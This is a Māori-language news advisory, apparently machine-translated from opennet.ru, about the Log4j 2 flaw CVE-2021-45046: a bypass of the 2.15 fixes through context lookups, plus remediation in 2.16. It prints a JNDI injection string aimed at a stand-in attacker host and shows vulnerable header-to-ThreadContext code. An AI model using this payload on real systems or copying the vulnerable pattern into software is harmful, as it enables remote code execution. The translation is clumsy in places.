Ko tetahi atu whakaraeraetanga kua kitea i roto i te whakatinanatanga o nga tirotiro JNDI i roto i te whare pukapuka Log4j 2 (CVE-2021-45046), ka puta ahakoa nga whakatikatika i whakauruhia ki te tuku 2.15 me te aha te whakamahi i te tautuhinga "log4j2.noFormatMsgLookup" mo te whakamarumaru. He kino te raru mo nga putanga tawhito o Log4j 2, ka tiakina ma te whakamahi i te haki "noFormatMsgLookup", na te mea ka taea te karo i te whakamarumaru mai i nga whakaraeraetanga o mua (Log4Shell, CVE-2021-44228), ka taea e koe te mahi i to waehere ki runga tūmau. Mo nga kaiwhakamahi o te putanga 2.15, he whakawhäitihia te whakamahi kia tukituki te tono na te ruha o nga rauemi e waatea ana.
Ka puta noa te whakaraeraetanga i runga i nga punaha e whakamahi ana i nga Tirohanga Horopaki mo te takiuru, penei i te ${ctx:loginId}, i nga tauira MDC ranei (Mahere Horopaki Miro), penei i te %X, %mdc, me te %MDC. Ko te mahi ka heke iho ki te hanga tikanga mo te whakaputa raraunga kei roto nga whakakapinga JNDI ki te raarangi ka whakamahia nga uiui horopaki, tauira MDC ranei i roto i te tono e tautuhi ana i nga ture mo te whakahōputu putanga ki te rangitaki.
Ko nga Kairangahau mai i LunaSec i kii mo nga putanga o Log4j iti iho i te 2.15, ka taea te whakamahi i tenei whakaraeraetanga hei vector hou mo te whakaeke Log4Shell, ka arahi ki te mahi waehere, mena ka whakamahia nga whakaaturanga ThreadContext e uru ana ki nga raraunga o waho i roto i te putanga rangitaki, ahakoa ko te Kua whakahohea te haki "tiaki". noMsgFormatLookups" ranei te tauira "%m{nolookups}".
Ko te karo i te whakamarutanga ka heke ki te meka kaore i te whakakapi tika i te "${jndi:ldap://attacker.com/a}", ka whakakapihia tenei korero ma te uara o te taurangi takawaenga e whakamahia ana i roto i nga ture mo te whakahōputu i te putanga rangitaki. . Hei tauira, ki te whakamahia te patai horopaki ${ctx:apiversion} i te wa e whakaputa ana ki te raarangi, katahi ka taea te whakaeke ma te whakakapi i nga raraunga "${jndi:ldap://attacker.com/a}" ki te uara kua tuhia ki te taurangi apiversion. Tauira o te waehere whakaraerae: appender.console.layout.pattern = ${ctx:apiversion} - %d{yyyy-MM-dd HH:mm:ss} %-5p %c{1}:%L - %m%n @ GetMapping("/") taupū String public(@RequestHeader("X-Api-Version") String apiVersion) { // Ko te uara pane pane HTTP "X-Api-Version" ka tukuna ki te ThreadContext ThreadContext.put("apiversion ", apiVersion ); // I te whakaputanga ki te rangitaki, ka tukatukahia te uara apiversion o waho ma te whakamahi i te whakakapinga ${ctx:apiversion} logger.info("I whiwhi tono mo te putanga API"); hoki "Kia ora, te ao!"; }
I roto i te putanga Log4j 2.15, ka taea te whakaraeraetanga ki te mahi i nga whakaeke DoS i te wa e tukuna ana nga uara ki te ThreadContext, ka puta he kopikopiko ki te tukatuka tauira whakahōputu putanga.
Ko nga whakahoutanga 2.16 me 2.12.2 kua whakaputaina hei aukati i te whakaraeraetanga. I roto i te pekanga Log4j 2.16, i tua atu i nga whakatikatika i whakatinanahia i te putanga 2.15 me te herenga o nga tono a JNDI LDAP ki te "localhost", kua whakakorehia te mahi a JNDI na te taunoa me te tautoko mo nga tauira whakakapinga karere ka tangohia. Hei mahi haumarutanga, ka whakaarohia kia tangohia te akomanga JndiLookup mai i te ara-akomanga (hei tauira, "zip -q -d log4j-core-*.jar org/apache/logging/log4j/core/lookup/JndiLookup.class") .
Ka taea e koe te whai i te ahua o nga whakatikanga i roto i nga kete i runga i nga wharangi tohatoha (Debian, Ubuntu, RHEL, SUSE, Fedora, Arch) me nga kaihanga papaaho Java (GitHub, Docker, Oracle, vmWare, Broadcom me Amazon/AWS, Juniper, VMware, Cisco, IBM, Red Hat, MongoDB, Okta, SolarWinds, Symantec, McAfee, SonicWall, FortiGuard, Ubiquiti, F-Secure, etc.).
Source: opennet.ru